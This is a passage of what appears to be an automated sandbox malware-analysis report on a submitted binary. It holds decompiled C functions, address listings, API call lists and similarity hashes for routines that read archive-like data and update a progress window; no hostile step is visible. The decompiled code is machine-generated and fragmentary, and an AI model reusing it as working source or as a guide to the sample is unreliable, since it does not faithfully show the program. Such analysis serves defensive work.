                                                                                                                            0x00406ceb
                                                                                                                            0x00406cee
                                                                                                                            0x00406cf0
                                                                                                                            0x00406e01
                                                                                                                            0x00406e03
                                                                                                                            0x00406e07
                                                                                                                            0x00000000
                                                                                                                            0x00406e07
                                                                                                                            0x00406cf8
                                                                                                                            0x00406cf9
                                                                                                                            0x00406cfe
                                                                                                                            0x00406cff
                                                                                                                            0x00406d09
                                                                                                                            0x00406d0b
                                                                                                                            0x00406d0e
                                                                                                                            0x00406d10
                                                                                                                            0x00000000
                                                                                                                            0x00406d10
                                                                                                                            0x00406d18
                                                                                                                            0x00406d19
                                                                                                                            0x00406d1e
                                                                                                                            0x00406d1f
                                                                                                                            0x00406d29
                                                                                                                            0x00406d2b
                                                                                                                            0x00406d2e
                                                                                                                            0x00406d30
                                                                                                                            0x00000000
                                                                                                                            0x00406d30
                                                                                                                            0x00406d38
                                                                                                                            0x00406d39
                                                                                                                            0x00406d3e
                                                                                                                            0x00406d3f
                                                                                                                            0x00406d49
                                                                                                                            0x00406d4b
                                                                                                                            0x00406d4e
                                                                                                                            0x00406d50
                                                                                                                            0x00000000
                                                                                                                            0x00406d50
                                                                                                                            0x00406d58
                                                                                                                            0x00406d59
                                                                                                                            0x00406d5e
                                                                                                                            0x00406d5f
                                                                                                                            0x00406d69
                                                                                                                            0x00406d6b
                                                                                                                            0x00406d6e
                                                                                                                            0x00406d70
                                                                                                                            0x00000000
                                                                                                                            0x00406d70
                                                                                                                            0x00406d78
                                                                                                                            0x00406d79
                                                                                                                            0x00406d7e
                                                                                                                            0x00406d7f
                                                                                                                            0x00406d89
                                                                                                                            0x00406d8b
                                                                                                                            0x00406d8e
                                                                                                                            0x00406d90
                                                                                                                            0x00000000
                                                                                                                            0x00406d90
                                                                                                                            0x00406d95
                                                                                                                            0x00406d96
                                                                                                                            0x00406d9b
                                                                                                                            0x00406d9c
                                                                                                                            0x00406da6
                                                                                                                            0x00406da8
                                                                                                                            0x00406dab
                                                                                                                            0x00406dad
                                                                                                                            0x00000000
                                                                                                                            0x00406dad
                                                                                                                            0x00406db2
                                                                                                                            0x00406db3
                                                                                                                            0x00406db8
                                                                                                                            0x00406db9
                                                                                                                            0x00406dc3
                                                                                                                            0x00406dc5
                                                                                                                            0x00406dc8
                                                                                                                            0x00406dca
                                                                                                                            0x00000000
                                                                                                                            0x00406dca
                                                                                                                            0x00406dcf
                                                                                                                            0x00406dd5
                                                                                                                            0x00406dd6
                                                                                                                            0x00406dd7
                                                                                                                            0x00406de1
                                                                                                                            0x00000000
                                                                                                                            0x00406e10
                                                                                                                            0x00406de3
                                                                                                                            0x00406de9
                                                                                                                            0x00406dec
                                                                                                                            0x00406dfc
                                                                                                                            0x00406dfc
                                                                                                                            0x00406dfe
                                                                                                                            0x00000000
                                                                                                                            0x00406dfe
                                                                                                                            0x00406dee
                                                                                                                            0x00406df6
                                                                                                                            0x00406dfa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406e19

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcmp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1475443563-0
                                                                                                                            • Opcode ID: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
                                                                                                                            • Instruction ID: 51bef7657f4b217767cf2214e4817ef679418496c32ecdcb676d7bec614d087e
                                                                                                                            • Opcode Fuzzy Hash: 35e1d9353c972ffb1d5c621511119ceb4edb1679282bba52ecb09f52cd819193
                                                                                                                            • Instruction Fuzzy Hash: 12417575A00718ABE6105A11EC41AEB736CDE64758B11002AFC4BB7681EB38AEA486DD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404C22 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 29libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404C22() {
				CHAR* _t7;

				_t7 = "kernel32.dll";
				 *0x41f16c = GetProcAddress(GetModuleHandleA(_t7), "FindFirstStreamW");
				 *0x41f168 = GetProcAddress(GetModuleHandleA(_t7), "FindNextStreamW");
				return 0x41f164;
			}




                                                                                                                            0x00404c3b
                                                                                                                            0x00404c59
                                                                                                                            0x00404c63
                                                                                                                            0x00404c6e

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,FindFirstStreamW), ref: 00404C48
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00404C51
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,FindNextStreamW), ref: 00404C5E
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00404C61
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                            • API String ID: 1646373207-4044117955
                                                                                                                            • Opcode ID: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
                                                                                                                            • Instruction ID: b848578b948c886adf4ab909bcc43a8b23ab1992de3229df41bf613d256c2862
                                                                                                                            • Opcode Fuzzy Hash: a0e0ffeeea9361e73f572bd643a1eadea7e86d774db87774120aa9dc83c52679
                                                                                                                            • Instruction Fuzzy Hash: 08E012B1A45318BA960067B9AC848A7BA9CD9D93623154437A214E3250D6F95C458BD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EE2C Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E0040EE2C(signed int** __ecx, signed int __edx, void* __eflags, signed int* _a4, char _a7) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int** _v44;
				signed int _v48;
				void* __ebp;
				signed int* _t111;
				signed int* _t113;
				signed int* _t114;
				intOrPtr _t121;
				signed int _t123;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t134;
				signed int _t138;
				signed int _t145;
				signed int _t148;
				signed int** _t149;
				signed int _t157;
				signed int _t162;
				void* _t170;
				signed int** _t175;
				signed int _t177;
				intOrPtr* _t180;
				intOrPtr _t181;
				signed int _t182;
				intOrPtr* _t183;
				signed int* _t185;

				_t173 = __edx;
				_t175 = __ecx;
				_v44 = __ecx;
				_t148 = E0040EB3D(__ecx, __edx, __eflags);
				_v28 = _t148;
				if(_t148 == 0) {
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
				}
				_push(_t148);
				E00410BF8(_a4);
				_v16 = 0;
				_v12 = 0;
				if(_t148 <= 0) {
					L22:
					_t111 = _a4;
					_t148 = _t148 - 1;
					_t66 = _t111 + 8; // 0x8
					_t180 = _t66;
					_v28 = _t180;
					E00410C85(_t180, _t148);
					_v12 = _v12 & 0x00000000;
					_t197 = _t148;
					if(_t148 > 0) {
						goto L27;
					}
				} else {
					_v24 = 0;
					while(1) {
						_t185 = _v24 +  *_a4;
						_t123 = E0040E9B4(_t175);
						_v5 = _t123;
						if((_t123 & 0x000000c0) != 0) {
							break;
						}
						_t162 = _t123 & 0x0000000f;
						_v40 = _t162;
						if(_t162 > 8) {
							L25:
							_push(0x41de18);
							_push( &_a7);
							L00418E02();
							L26:
							_t180 = _v28;
							L27:
							_t183 =  *_t180 + _v12 * 8;
							 *_t183 = E0040EB3D(_t175, _t173, _t197);
							_t121 = E0040EB3D(_t175, _t173, _t197);
							_v12 = _v12 + 1;
							 *((intOrPtr*)(_t183 + 4)) = _t121;
							if(_v12 < _t148) {
								goto L26;
							}
						} else {
							_t129 =  *((intOrPtr*)(_t175 + 8));
							_t173 =  *((intOrPtr*)(_t175 + 4)) - _t129;
							if(_t162 > _t173) {
								goto L25;
							} else {
								_t130 = _t129 +  *_t175;
								_t148 = 0;
								_v48 = _v48 & 0;
								_v20 = _v20 & 0;
								_v32 = _t130;
								if(_t162 > 0) {
									while(1) {
										asm("cdq");
										_t170 = 8;
										_v36 =  *(_v20 + _t130) & 0x000000ff;
										_t177 = _t173;
										_t173 = _v48;
										_t145 = E004190E0(_t148, _t170, _t173);
										_v20 = _v20 + 1;
										_t148 = _v36 | _t145;
										_t162 = _v40;
										_v48 = _t177 | _t173;
										if(_v20 >= _t162) {
											break;
										}
										_t130 = _v32;
									}
									_t175 = _v44;
								}
								_t194 = _v5 & 0x00000010;
								 *((intOrPtr*)(_t175 + 8)) =  *((intOrPtr*)(_t175 + 8)) + _t162;
								 *_t185 = _t148;
								_t185[1] = _v48;
								if((_v5 & 0x00000010) == 0) {
									_t185[4] = 1;
								} else {
									_t185[4] = E0040EB3D(_t175, _t173, _t194);
									E0040EB3D(_t175, _t173, _t194);
								}
								_t195 = _v5 & 0x00000020;
								if((_v5 & 0x00000020) == 0) {
									_t134 = _t185[2];
									__eflags = _t134;
									if(_t134 != 0) {
										E00403204(_t134, _t134);
										_t51 =  &(_t185[2]);
										 *_t51 = _t185[2] & 0x00000000;
										__eflags =  *_t51;
									}
									_t53 =  &(_t185[3]);
									 *_t53 = _t185[3] & 0x00000000;
									__eflags =  *_t53;
								} else {
									_t138 = E0040EB3D(_t175, _t173, _t195);
									_t148 =  &(_t185[2]);
									_v40 = _t138;
									E00407AB8(_t148, _t138);
									E0040E9D2(_t175,  *_t148, _v40);
								}
								_v24 = _v24 + 0x18;
								_v16 = _v16 + _t185[4];
								_v12 = _v12 + 1;
								if(_v12 < _v28) {
									continue;
								} else {
									_t148 = _v28;
									goto L22;
								}
							}
						}
						goto L28;
					}
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
					goto L25;
				}
				L28:
				_t181 = _v16;
				if(_t181 < _t148) {
					_push(0x41de18);
					_push( &_a7);
					L00418E02();
				}
				_t113 = _a4;
				_t182 = _t181 - _t148;
				_t89 = _t113 + 0x10; // 0x10
				_t149 = _t89;
				_v44 = _t149;
				_t114 = E00410CC3(_t149, _t182);
				if(_t182 != 1) {
					L44:
					_v12 = _v12 & 0x00000000;
					_t209 = _t182;
					if(_t182 > 0) {
						while(1) {
							_t114 = E0040EB3D(_t175, _t173, _t209);
							_v12 = _v12 + 1;
							( *_t149)[_v12] = _t114;
							if(_v12 >= _t182) {
								goto L48;
							}
							_t149 = _v44;
						}
					}
				} else {
					_t173 = 0;
					if(_v16 > 0) {
						_t114 = _a4;
						_t182 = _t114[3];
						do {
							_t157 = 0;
							if(_t182 <= 0) {
								L37:
								_t157 = _t157 | 0xffffffff;
							} else {
								_t114 =  *_v28;
								while( *_t114 != _t173) {
									_t157 = _t157 + 1;
									_t114 =  &(_t114[2]);
									if(_t157 < _t182) {
										continue;
									} else {
										goto L37;
									}
									goto L38;
								}
							}
							L38:
							if(_t157 < 0) {
								_t114 =  *_t149;
								 *_t114 = _t173;
							} else {
								goto L39;
							}
							goto L42;
							L39:
							_t173 = _t173 + 1;
						} while (_t173 < _v16);
					}
					L42:
					if(_t173 == _v16) {
						_push(0x41de18);
						_t114 =  &_a7;
						_push(_t114);
						L00418E02();
						goto L44;
					}
				}
				L48:
				return _t114;
			}





































                                                                                                                            0x0040ee2c
                                                                                                                            0x0040ee35
                                                                                                                            0x0040ee37
                                                                                                                            0x0040ee3f
                                                                                                                            0x0040ee45
                                                                                                                            0x0040ee48
                                                                                                                            0x0040ee4d
                                                                                                                            0x0040ee58
                                                                                                                            0x0040ee59
                                                                                                                            0x0040ee59
                                                                                                                            0x0040ee61
                                                                                                                            0x0040ee62
                                                                                                                            0x0040ee69
                                                                                                                            0x0040ee6c
                                                                                                                            0x0040ee6f
                                                                                                                            0x0040ef8a
                                                                                                                            0x0040ef8a
                                                                                                                            0x0040ef8d
                                                                                                                            0x0040ef8f
                                                                                                                            0x0040ef8f
                                                                                                                            0x0040ef94
                                                                                                                            0x0040ef97
                                                                                                                            0x0040ef9c
                                                                                                                            0x0040efa0
                                                                                                                            0x0040efa2
                                                                                                                            0x00000000
                                                                                                                            0x0040efa4
                                                                                                                            0x0040ee75
                                                                                                                            0x0040ee75
                                                                                                                            0x0040ee78
                                                                                                                            0x0040ee80
                                                                                                                            0x0040ee82
                                                                                                                            0x0040ee89
                                                                                                                            0x0040ee8c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ee95
                                                                                                                            0x0040ee9a
                                                                                                                            0x0040ee9d
                                                                                                                            0x0040efba
                                                                                                                            0x0040efbd
                                                                                                                            0x0040efc8
                                                                                                                            0x0040efc9
                                                                                                                            0x0040efce
                                                                                                                            0x0040efce
                                                                                                                            0x0040efd1
                                                                                                                            0x0040efd6
                                                                                                                            0x0040efe2
                                                                                                                            0x0040efe4
                                                                                                                            0x0040efe9
                                                                                                                            0x0040efec
                                                                                                                            0x0040eff2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eea3
                                                                                                                            0x0040eea3
                                                                                                                            0x0040eea9
                                                                                                                            0x0040eead
                                                                                                                            0x00000000
                                                                                                                            0x0040eeb3
                                                                                                                            0x0040eeb3
                                                                                                                            0x0040eeb5
                                                                                                                            0x0040eeb7
                                                                                                                            0x0040eeba
                                                                                                                            0x0040eebf
                                                                                                                            0x0040eec2
                                                                                                                            0x0040eec9
                                                                                                                            0x0040eed2
                                                                                                                            0x0040eed5
                                                                                                                            0x0040eed6
                                                                                                                            0x0040eed9
                                                                                                                            0x0040eedb
                                                                                                                            0x0040eee0
                                                                                                                            0x0040eeec
                                                                                                                            0x0040eeef
                                                                                                                            0x0040eef1
                                                                                                                            0x0040eef7
                                                                                                                            0x0040eefa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eec6
                                                                                                                            0x0040eec6
                                                                                                                            0x0040eefc
                                                                                                                            0x0040eefc
                                                                                                                            0x0040ef04
                                                                                                                            0x0040ef08
                                                                                                                            0x0040ef0e
                                                                                                                            0x0040ef10
                                                                                                                            0x0040ef13
                                                                                                                            0x0040ef28
                                                                                                                            0x0040ef15
                                                                                                                            0x0040ef1e
                                                                                                                            0x0040ef21
                                                                                                                            0x0040ef21
                                                                                                                            0x0040ef2f
                                                                                                                            0x0040ef33
                                                                                                                            0x0040ef58
                                                                                                                            0x0040ef5b
                                                                                                                            0x0040ef5d
                                                                                                                            0x0040ef60
                                                                                                                            0x0040ef65
                                                                                                                            0x0040ef65
                                                                                                                            0x0040ef65
                                                                                                                            0x0040ef69
                                                                                                                            0x0040ef6a
                                                                                                                            0x0040ef6a
                                                                                                                            0x0040ef6a
                                                                                                                            0x0040ef35
                                                                                                                            0x0040ef37
                                                                                                                            0x0040ef3c
                                                                                                                            0x0040ef42
                                                                                                                            0x0040ef45
                                                                                                                            0x0040ef51
                                                                                                                            0x0040ef51
                                                                                                                            0x0040ef71
                                                                                                                            0x0040ef75
                                                                                                                            0x0040ef78
                                                                                                                            0x0040ef81
                                                                                                                            0x00000000
                                                                                                                            0x0040ef87
                                                                                                                            0x0040ef87
                                                                                                                            0x00000000
                                                                                                                            0x0040ef87
                                                                                                                            0x0040ef81
                                                                                                                            0x0040eead
                                                                                                                            0x00000000
                                                                                                                            0x0040ee9d
                                                                                                                            0x0040efa9
                                                                                                                            0x0040efb4
                                                                                                                            0x0040efb5
                                                                                                                            0x00000000
                                                                                                                            0x0040efb5
                                                                                                                            0x0040eff4
                                                                                                                            0x0040eff4
                                                                                                                            0x0040eff9
                                                                                                                            0x0040effe
                                                                                                                            0x0040f009
                                                                                                                            0x0040f00a
                                                                                                                            0x0040f00a
                                                                                                                            0x0040f00f
                                                                                                                            0x0040f012
                                                                                                                            0x0040f015
                                                                                                                            0x0040f015
                                                                                                                            0x0040f01a
                                                                                                                            0x0040f01d
                                                                                                                            0x0040f025
                                                                                                                            0x0040f077
                                                                                                                            0x0040f077
                                                                                                                            0x0040f07b
                                                                                                                            0x0040f07d
                                                                                                                            0x0040f084
                                                                                                                            0x0040f088
                                                                                                                            0x0040f090
                                                                                                                            0x0040f096
                                                                                                                            0x0040f099
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f081
                                                                                                                            0x0040f081
                                                                                                                            0x0040f084
                                                                                                                            0x0040f027
                                                                                                                            0x0040f027
                                                                                                                            0x0040f02c
                                                                                                                            0x0040f02e
                                                                                                                            0x0040f031
                                                                                                                            0x0040f034
                                                                                                                            0x0040f034
                                                                                                                            0x0040f038
                                                                                                                            0x0040f04b
                                                                                                                            0x0040f04b
                                                                                                                            0x0040f03a
                                                                                                                            0x0040f03d
                                                                                                                            0x0040f03f
                                                                                                                            0x0040f043
                                                                                                                            0x0040f044
                                                                                                                            0x0040f049
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f049
                                                                                                                            0x0040f03f
                                                                                                                            0x0040f04e
                                                                                                                            0x0040f050
                                                                                                                            0x0040f05a
                                                                                                                            0x0040f05c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040f052
                                                                                                                            0x0040f052
                                                                                                                            0x0040f053
                                                                                                                            0x0040f058
                                                                                                                            0x0040f05e
                                                                                                                            0x0040f061
                                                                                                                            0x0040f066
                                                                                                                            0x0040f06e
                                                                                                                            0x0040f071
                                                                                                                            0x0040f072
                                                                                                                            0x00000000
                                                                                                                            0x0040f072
                                                                                                                            0x0040f061
                                                                                                                            0x0040f09f
                                                                                                                            0x0040f09f

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0040EB3D: _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EB60
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EE59
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFB5
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040EFC9
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F00A
                                                                                                                            • _CxxThrowException.MSVCRT(?,0041DE18), ref: 0040F072
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionThrow$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3129652135-3916222277
                                                                                                                            • Opcode ID: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
                                                                                                                            • Instruction ID: b719d39ac1e1c0dfc465c254aa8864d8cdc5b6410d67c82479710a15fcd5db0f
                                                                                                                            • Opcode Fuzzy Hash: e26337be683b5af4c30aef131a22ba05f72600e83a284499b723228e6f86e7e5
                                                                                                                            • Instruction Fuzzy Hash: 7F918271E00309ABCF14DFA5C4815AEBBB5AF49314F10847FE855BB382C738AA958B94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040BA18 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 96%
                                                                                                                            			E0040BA18(void* __ecx, void* __edx) {
				void* _t47;
				void* _t55;
				signed int _t59;
				intOrPtr _t60;
				void* _t74;
				void* _t77;
				struct _CRITICAL_SECTION* _t80;
				signed int _t81;
				void* _t83;

				_t74 = __edx;
				E00418D80(E0041A0A4, _t83);
				_t77 = __ecx;
				_t80 = __ecx + 0x40;
				if(E0040B871(_t80) == 0) {
					E0040BC1B(__ecx);
					EnterCriticalSection(_t80);
					_t59 =  *(_t80 + 0x20);
					 *(_t83 - 0x10) =  *(_t80 + 0x24);
					 *((intOrPtr*)(_t83 - 0x20)) =  *((intOrPtr*)(_t80 + 0x28));
					 *((intOrPtr*)(_t83 - 0x1c)) =  *((intOrPtr*)(_t80 + 0x2c));
					LeaveCriticalSection(_t80);
					if(_t59 !=  *((intOrPtr*)(_t77 + 0x28)) ||  *(_t83 - 0x10) !=  *((intOrPtr*)(_t77 + 0x2c))) {
						E0040B92C(_t77, _t59,  *(_t83 - 0x10));
					}
					E0040B99F(_t77,  *((intOrPtr*)(_t83 - 0x20)),  *((intOrPtr*)(_t83 - 0x1c)));
					_t81 = 0;
					if((_t59 |  *(_t83 - 0x10)) == 0) {
						 *(_t83 - 0x10) = _t81;
						_t59 = 1;
					}
					_t60 = E00418F90(E004190A0( *((intOrPtr*)(_t83 - 0x20)),  *((intOrPtr*)(_t83 - 0x1c)), 0x64, _t81), _t74, _t59,  *(_t83 - 0x10));
					if(_t60 !=  *((intOrPtr*)(_t77 + 0x34))) {
						asm("cdq");
						E0040315D(_t83 - 0xa4, _t46, _t74);
						E004036B0(_t83 - 0x18, _t83 - 0xa4);
						 *(_t83 - 4) = _t81;
						E004039D8(_t83 - 0x18, "% ");
						_t55 = E00403204(SetWindowTextW( *(_t77 + 4),  *(E00403632(_t83 - 0x24, _t83 - 0x18, _t77 + 0xc))),  *((intOrPtr*)(_t83 - 0x24)));
						 *((intOrPtr*)(_t77 + 0x34)) = _t60;
						E00403204(_t55,  *((intOrPtr*)(_t83 - 0x18)));
					}
					_t47 = 1;
				} else {
					_t47 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return _t47;
			}












                                                                                                                            0x0040ba18
                                                                                                                            0x0040ba1d
                                                                                                                            0x0040ba2a
                                                                                                                            0x0040ba2c
                                                                                                                            0x0040ba38
                                                                                                                            0x0040ba44
                                                                                                                            0x0040ba4a
                                                                                                                            0x0040ba53
                                                                                                                            0x0040ba56
                                                                                                                            0x0040ba5c
                                                                                                                            0x0040ba63
                                                                                                                            0x0040ba66
                                                                                                                            0x0040ba6f
                                                                                                                            0x0040ba7f
                                                                                                                            0x0040ba7f
                                                                                                                            0x0040ba8c
                                                                                                                            0x0040ba98
                                                                                                                            0x0040ba99
                                                                                                                            0x0040ba9d
                                                                                                                            0x0040baa0
                                                                                                                            0x0040baa0
                                                                                                                            0x0040baba
                                                                                                                            0x0040babf
                                                                                                                            0x0040bac1
                                                                                                                            0x0040baca
                                                                                                                            0x0040bad9
                                                                                                                            0x0040bae6
                                                                                                                            0x0040bae9
                                                                                                                            0x0040bb0b
                                                                                                                            0x0040bb13
                                                                                                                            0x0040bb16
                                                                                                                            0x0040bb1c
                                                                                                                            0x0040bb1d
                                                                                                                            0x0040ba3a
                                                                                                                            0x0040ba3a
                                                                                                                            0x0040ba3a
                                                                                                                            0x0040bb25
                                                                                                                            0x0040bb2d

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040BA1D
                                                                                                                              • Part of subcall function 0040B871: EnterCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B876
                                                                                                                              • Part of subcall function 0040B871: LeaveCriticalSection.KERNEL32(?,?,?,0040BB91), ref: 0040B880
                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 0040BA4A
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040BA66
                                                                                                                            • __aulldiv.LIBCMT ref: 0040BAB5
                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 0040BB02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$EnterLeave$H_prologTextWindow__aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 729368748-0
                                                                                                                            • Opcode ID: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
                                                                                                                            • Instruction ID: cd95b3165d2d8f135bb25e3b680c2f95c897e520c5a9096d40279e617bd503f6
                                                                                                                            • Opcode Fuzzy Hash: dae6ce3810544a55a0cadaf366efc3d68dae998be2ac9b3ae07b387af689c148
                                                                                                                            • Instruction Fuzzy Hash: CB313075A00219AFCB11EFA5CC419EEBBB9FF48314F00442AF515B3691C739A955CFA8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040B88B Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040B88B(void* __ecx) {
				void* _t30;

				_t30 = __ecx;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) | 0xffffffff;
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *(__ecx + 0x34) =  *(__ecx + 0x34) | 0xffffffff;
				 *((char*)(__ecx + 0x38)) = 1;
				E00418AC0(__ecx + 0x3c);
				 *((intOrPtr*)(_t30 + 0x30)) = GetDlgItem( *(__ecx + 4), 0x64);
				if( *(_t30 + 0x70) >= 0) {
					SendMessageW( *(_t30 + 4), 0x80, 1, LoadIconW( *0x41f158,  *(_t30 + 0x70) & 0x0000ffff));
				}
				 *((intOrPtr*)(_t30 + 8)) = SetTimer( *(_t30 + 4), 3, 0x64, 0);
				SetWindowTextW( *(_t30 + 4),  *(_t30 + 0xc));
				E0040BC1B(_t30);
				return 1;
			}




                                                                                                                            0x0040b88c
                                                                                                                            0x0040b88e
                                                                                                                            0x0040b892
                                                                                                                            0x0040b896
                                                                                                                            0x0040b89d
                                                                                                                            0x0040b8a1
                                                                                                                            0x0040b8b5
                                                                                                                            0x0040b8b8
                                                                                                                            0x0040b8d6
                                                                                                                            0x0040b8d6
                                                                                                                            0x0040b8ee
                                                                                                                            0x0040b8f4
                                                                                                                            0x0040b8fc
                                                                                                                            0x0040b904

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00418AC0: SetEvent.KERNEL32(?,00407A1F), ref: 00418AC3
                                                                                                                            • GetDlgItem.USER32 ref: 0040B8AB
                                                                                                                            • LoadIconW.USER32(00000000), ref: 0040B8C5
                                                                                                                            • SendMessageW.USER32(?,00000080,00000001,00000000), ref: 0040B8D6
                                                                                                                            • SetTimer.USER32(?,00000003,00000064,00000000), ref: 0040B8E5
                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040B8F4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
